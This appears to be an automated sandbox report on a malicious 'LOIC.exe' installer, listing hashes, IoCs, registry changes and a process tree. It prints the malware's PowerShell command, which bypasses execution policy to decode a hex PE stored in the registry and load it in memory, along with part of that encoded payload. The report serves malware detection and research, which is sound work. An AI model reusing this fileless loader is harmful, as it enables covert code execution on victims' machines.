1ff26b054336175beab72997a752fb08ff7ebbb09377d4f682976530120d28dd

Analysis

max time kernel
1796s
max time network
1798s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
15/03/2024, 22:58

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

LOIC.exe
Size

6.1MB
MD5

c54c3a6c2fdf9f9a458f3d552e355848
SHA1

f53c3142902821377c4cfc6a9b32771bfeefe82d
SHA256

ddb156846d1097880cc9ce51240b2b99b34925d420d28eac86f834aa0c92d49d
SHA512

1655de2e409b1d98484bb5010b6a8f5c3f53717e0a5458d074e978386859aed8b8de0983047056a8c243156a3d78c17349d66fdb20fa14ba1a532a0d8af0caae
SSDEEP

98304:31aHm6zKsIOaEABObLI+7dCcYRAzSVdWFOjdSWYj1c6XDm1tc:FgHvL/o0l4dw5cWqe

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3628	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2448	MSI82AB.tmp

Loads dropped DLL 18 IoCs

pid	Process
32	LOIC.exe
32	LOIC.exe
5016	MsiExec.exe
5016	MsiExec.exe
4120	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
5004	MsiExec.exe
424	MsiExec.exe
5004	MsiExec.exe
32	LOIC.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	LOIC.exe
File opened (read-only)	\??\G:	LOIC.exe
File opened (read-only)	\??\O:	LOIC.exe
File opened (read-only)	\??\T:	LOIC.exe
File opened (read-only)	\??\V:	LOIC.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	LOIC.exe
File opened (read-only)	\??\W:	LOIC.exe
File opened (read-only)	\??\X:	LOIC.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	LOIC.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	LOIC.exe
File opened (read-only)	\??\M:	LOIC.exe
File opened (read-only)	\??\Q:	LOIC.exe
File opened (read-only)	\??\S:	LOIC.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	LOIC.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	LOIC.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	LOIC.exe
File opened (read-only)	\??\P:	LOIC.exe
File opened (read-only)	\??\R:	LOIC.exe
File opened (read-only)	\??\U:	LOIC.exe
File opened (read-only)	\??\Z:	LOIC.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	LOIC.exe
File opened (read-only)	\??\H:	LOIC.exe
File opened (read-only)	\??\L:	LOIC.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\index.js	msiexec.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e577b4a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7BF6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7CB3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7DB0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7FD6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8142.tmp	msiexec.exe
File created	C:\Windows\Tasks\C__Users_Admin_AppData_Local_Temp_LOIC.exe.job	LOIC.exe
File opened for modification	C:\Windows\Installer\MSI7D11.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7EAB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7F29.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI80A4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI821E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI82AB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D51.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8054.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{265B7A13-12D1-49C5-8834-82C96F9753A3}	msiexec.exe
File created	C:\Windows\Installer\e577b4a.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8083.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\JSFile_.js = "0"	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\RegisteredApplications	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSI82AB.tmp
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK\FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CÐ\u0090Ð¡D21B8014CÐ\u0090Ð¡CÐ\u0090Ð¡D21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004CÐ\u0090Ð¡01030088DDE25D0000000000000000E00022000B015000003E000000040000000000002E5D000000200000006000000000400000200000000200000400000000000000040000000000000000A000000002000098890000020040850000100000100000000010000010000000000000100000000000000000000000DCÐ\u0090Ð¡5CÐ\u0090Ð¡00004F000000006000001000000000000000000000000000000000000000008000000CÐ\u0090Ð¡000000A45B00001CÐ\u0090Ð¡0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000006CÐ\u0090Ð¡3D000000200000003E000000020000000000000000000000000000200000602E7273726300000010000000006000000002000000400000000000000000000000000000400000402E72656CÐ\u0090Ð¡6F6300000CÐ\u0090Ð¡0000000080000000020000004200000000000000000000000000004000004200000000000000000000000000000000105D0000000000004800000002000500983A00000CÐ\u0090Ð¡2100000100000007000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000E67201000070800B000004720B000070800E000004280700000A800F00000473060000068010000004730800000A80110000041480130000042A0000133003007A0000000000000002280900000A02167D0100000402147D0200000402167D030000040202FE060E000006730A00000A17730B00000A7D040000040202FE0609000006730A00000A730CÐ\u0090Ð¡00000A7D0500000402177D0600000402167D0700000402721D0000707D0A0000040272D60000707D0CÐ\u0090Ð¡0000040272E00000707D0D0000042A2E7E100000046F080000062A00001B300800830000000000000017027B0D000004027CÐ\u0090Ð¡01000004730D00000A8012000004027B010000042D2E280E00000A7E180000042CÐ\u0090Ð¡077E180000042B167E16000004FE0629000006730F00000A258018000004281000000ADE0CÐ\u0090Ð¡281100000A281200000ADE00027B04000004147208010070168D0800000114141417281300000A26027B050000046F1400000A2A0001100000000000004F4F000CÐ\u0090Ð¡10000001133003001D00000001000011027B060000042D0D027CÐ\u0090Ð¡07000004250A064A17D65417281500000A2BE30000001B300CÐ\u0090Ð¡00D105000002000011020328200000067E0B0000041516281600000A0A06169A721401007016281700000A2D1302167D0600000402721401007028120000062A06169A721CÐ\u0090Ð¡01007016281700000A2D4A02177D0600000402721CÐ\u0090Ð¡0100707E0B000004027B07000004281800000A281900000A281200000602167D070000040272200100707E0B00000402281E000006281900000A28120000062A06169A722401007016281700000A3A770100007E1A00000A722A01007002027B0D0000042823000006281B00000A723E010070281B00000A06179A281B00000A281CÐ\u0090Ð¡00000A176F1D00000A39F300000002027B08000004027B09000004061A9A061B9A0202027B0CÐ\u0090Ð¡00000428240000067242010070281B00000A022819000006281B00000A281CÐ\u0090Ð¡00000A2823000006281CÐ\u0090Ð¡00000A724601007002027B0D0000042823000006281B00000A723E010070281B00000A06179A281B00000A281CÐ\u0090Ð¡00000A06179A14281E00000A6F1F00000A06189A282000000A06199A282100000A06179A17280B00000626DD51040000281100000A021D8D270000012516727E010070A225177E0B000004A22518061B9AA225197E0B000004A2251A06179AA2251B7E0B000004A2251CÐ\u0090Ð¡16282200000AA2282300000A2812000006281200000ADDFCÐ\u0090Ð¡030000021D8D270000012516727E010070A225177E0B000004A22518061B9AA225197E0B000004A2251A06179AA2251B7E0B000004A2251CÐ\u0090Ð¡16282200000AA2282300000A28120000062A06169A728601007016281700000A2D6902027B08000004027B0900000406179A06189A0202027B0CÐ\u0090Ð¡00000428240000067242010070281B00000A022819000006281B00000A281CÐ\u0090Ð¡00000A2823000006281CÐ\u0090Ð¡00000A06199A061A9A282000000A061B9A282100000A061CÐ\u0090Ð¡9A061D9A282100000A280B000006262A06169A728CÐ\u0090Ð¡01007016281700000A3A290300000206179A280CÐ\u0090Ð¡000006147294010070178D08000001251606188F2700000125130E50A225130F1414178D2A0000012516179CÐ\u0090Ð¡251310282400000A111016912CÐ\u0090Ð¡20110E110F169A282500000AD027000001282600000A282700000A7427000001511472B20100701F2B8D08000001251602027B0D0000042823000006A2251706198F27000001250B50A2251F20061A8F27000001250CÐ\u0090Ð¡50A2251F21061B8F27000001250D50A2251F227E0F000004A2251F23061CÐ\u0090Ð¡8F2700000125130450A2251F24061D8F2700000125130550A2251F25061E8F2700000125130650A2251F26061F098F2700000125130750A2251F27061F0A8F2700000125130850A2251F28061F0B8F2700000125130950A2251F29061F0CÐ\u0090Ð¡8F2700000125130A50A2251F2A061F0D8F2700000125130B50A225130CÐ\u0090Ð¡14141F2B8D2A00000125D015000004282800000A25130D17281300000A26110D17912CÐ\u0090Ð¡1F07110CÐ\u0090Ð¡179A282500000AD027000001282600000A282700000A742700000151110D1F20912CÐ\u0090Ð¡2008110CÐ\u0090Ð¡1F209A282500000AD027000001282600000A282700000A74270000015"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithList	MSI82AB.tmp
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 01000000000000005659b67f2c77da01	MSI82AB.tmp
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MSI82AB.tmp
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000041d0ac7f2c77da01	MSI82AB.tmp
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile = "0"	MSI82AB.tmp
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MSI82AB.tmp
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
5016	MsiExec.exe
5016	MsiExec.exe
32	LOIC.exe
32	LOIC.exe
5004	MsiExec.exe
5004	MsiExec.exe
3220	msiexec.exe
3220	msiexec.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3220	msiexec.exe
Token: SeCreateTokenPrivilege	32	LOIC.exe
Token: SeAssignPrimaryTokenPrivilege	32	LOIC.exe
Token: SeLockMemoryPrivilege	32	LOIC.exe
Token: SeIncreaseQuotaPrivilege	32	LOIC.exe
Token: SeMachineAccountPrivilege	32	LOIC.exe
Token: SeTcbPrivilege	32	LOIC.exe
Token: SeSecurityPrivilege	32	LOIC.exe
Token: SeTakeOwnershipPrivilege	32	LOIC.exe
Token: SeLoadDriverPrivilege	32	LOIC.exe
Token: SeSystemProfilePrivilege	32	LOIC.exe
Token: SeSystemtimePrivilege	32	LOIC.exe
Token: SeProfSingleProcessPrivilege	32	LOIC.exe
Token: SeIncBasePriorityPrivilege	32	LOIC.exe
Token: SeCreatePagefilePrivilege	32	LOIC.exe
Token: SeCreatePermanentPrivilege	32	LOIC.exe
Token: SeBackupPrivilege	32	LOIC.exe
Token: SeRestorePrivilege	32	LOIC.exe
Token: SeShutdownPrivilege	32	LOIC.exe
Token: SeDebugPrivilege	32	LOIC.exe
Token: SeAuditPrivilege	32	LOIC.exe
Token: SeSystemEnvironmentPrivilege	32	LOIC.exe
Token: SeChangeNotifyPrivilege	32	LOIC.exe
Token: SeRemoteShutdownPrivilege	32	LOIC.exe
Token: SeUndockPrivilege	32	LOIC.exe
Token: SeSyncAgentPrivilege	32	LOIC.exe
Token: SeEnableDelegationPrivilege	32	LOIC.exe
Token: SeManageVolumePrivilege	32	LOIC.exe
Token: SeImpersonatePrivilege	32	LOIC.exe
Token: SeCreateGlobalPrivilege	32	LOIC.exe
Token: SeCreateTokenPrivilege	32	LOIC.exe
Token: SeAssignPrimaryTokenPrivilege	32	LOIC.exe
Token: SeLockMemoryPrivilege	32	LOIC.exe
Token: SeIncreaseQuotaPrivilege	32	LOIC.exe
Token: SeMachineAccountPrivilege	32	LOIC.exe
Token: SeTcbPrivilege	32	LOIC.exe
Token: SeSecurityPrivilege	32	LOIC.exe
Token: SeTakeOwnershipPrivilege	32	LOIC.exe
Token: SeLoadDriverPrivilege	32	LOIC.exe
Token: SeSystemProfilePrivilege	32	LOIC.exe
Token: SeSystemtimePrivilege	32	LOIC.exe
Token: SeProfSingleProcessPrivilege	32	LOIC.exe
Token: SeIncBasePriorityPrivilege	32	LOIC.exe
Token: SeCreatePagefilePrivilege	32	LOIC.exe
Token: SeCreatePermanentPrivilege	32	LOIC.exe
Token: SeBackupPrivilege	32	LOIC.exe
Token: SeRestorePrivilege	32	LOIC.exe
Token: SeShutdownPrivilege	32	LOIC.exe
Token: SeDebugPrivilege	32	LOIC.exe
Token: SeAuditPrivilege	32	LOIC.exe
Token: SeSystemEnvironmentPrivilege	32	LOIC.exe
Token: SeChangeNotifyPrivilege	32	LOIC.exe
Token: SeRemoteShutdownPrivilege	32	LOIC.exe
Token: SeUndockPrivilege	32	LOIC.exe
Token: SeSyncAgentPrivilege	32	LOIC.exe
Token: SeEnableDelegationPrivilege	32	LOIC.exe
Token: SeManageVolumePrivilege	32	LOIC.exe
Token: SeImpersonatePrivilege	32	LOIC.exe
Token: SeCreateGlobalPrivilege	32	LOIC.exe
Token: SeCreateTokenPrivilege	32	LOIC.exe
Token: SeAssignPrimaryTokenPrivilege	32	LOIC.exe
Token: SeLockMemoryPrivilege	32	LOIC.exe
Token: SeIncreaseQuotaPrivilege	32	LOIC.exe
Token: SeMachineAccountPrivilege	32	LOIC.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 3220 wrote to memory of 5016	3220	msiexec.exe	76
PID 3220 wrote to memory of 5016	3220	msiexec.exe	76
PID 3220 wrote to memory of 5016	3220	msiexec.exe	76
PID 32 wrote to memory of 5064	32	LOIC.exe	78
PID 32 wrote to memory of 5064	32	LOIC.exe	78
PID 32 wrote to memory of 5064	32	LOIC.exe	78
PID 3220 wrote to memory of 4120	3220	msiexec.exe	79
PID 3220 wrote to memory of 4120	3220	msiexec.exe	79
PID 3220 wrote to memory of 4120	3220	msiexec.exe	79
PID 32 wrote to memory of 204	32	LOIC.exe	80
PID 32 wrote to memory of 204	32	LOIC.exe	80
PID 32 wrote to memory of 204	32	LOIC.exe	80
PID 3220 wrote to memory of 5004	3220	msiexec.exe	81
PID 3220 wrote to memory of 5004	3220	msiexec.exe	81
PID 3220 wrote to memory of 5004	3220	msiexec.exe	81
PID 3220 wrote to memory of 424	3220	msiexec.exe	82
PID 3220 wrote to memory of 424	3220	msiexec.exe	82
PID 3220 wrote to memory of 424	3220	msiexec.exe	82
PID 3220 wrote to memory of 2448	3220	msiexec.exe	83
PID 3220 wrote to memory of 2448	3220	msiexec.exe	83
PID 3220 wrote to memory of 2448	3220	msiexec.exe	83
PID 2448 wrote to memory of 3528	2448	MSI82AB.tmp	84
PID 2448 wrote to memory of 3528	2448	MSI82AB.tmp	84
PID 2448 wrote to memory of 3528	2448	MSI82AB.tmp	84
PID 3528 wrote to memory of 3628	3528	WScript.exe	85
PID 3528 wrote to memory of 3628	3528	WScript.exe	85
PID 3528 wrote to memory of 3628	3528	WScript.exe	85

C:\Users\Admin\AppData\Local\Temp\LOIC.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC.exe"
1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32
- C:\Users\Admin\AppData\Local\Temp\LOIC.exe
  "C:\Users\Admin\AppData\Local\Temp\LOIC.exe"
  2⤵
  PID:5064
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi /qn AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\LOIC.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup " ALLUSERS="1"
  2⤵
  PID:204

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C18EC5E5BB8CBB0CE9B8499A3F9F8BF4 C
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:5016
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0A1D76C5839BF5516948D056230DEE09 C
  2⤵
  - Loads dropped DLL
  PID:4120
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E2BFD4DCD030B7B5D6058EC0C0170E09
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:5004
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 978B6CE11D9C550E06F740035010B1B1 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:424
- C:\Windows\Installer\MSI82AB.tmp
  "C:\Windows\Installer\MSI82AB.tmp" /DontWait "C:\Program Files (x86)\Common Files\index.js"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\Common Files\index.js"
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function MXrEbyrFuiEzczn([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK' -name 'FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK').FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK;$_b=$_b.replace('CÐÐ¡','C');[byte[]]$_0 = MXrEbyrFuiEzczn($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
      4⤵
      Blocklisted process makes network request
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:3628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e577b4d.rbs

Filesize
180KB

MD5
58461e01e759fa6e8d7524dcb1ec9f88

SHA1
82c39645840d7c77cf9ce8c4e00d3cc6fe02da96

SHA256
4ed153af5f74210ecf8c73ddbf1b5815bf120ea360e713e589d91bb241d16899

SHA512
6e820df09ea0b868f94adb2493c1c76ecf2d7a09969901e09d870c863c74d6bd9dac8d6e9c236ef2830b26f7c57387dc02385fce2f86e82fad17f396312fe371

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI74F2.tmp

Filesize
379KB

MD5
647145b1074e24a0c2bf8998917a8a90

SHA1
0c863b05a5599b2c1dd0645e086cda4a9f2fb954

SHA256
91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

SHA512
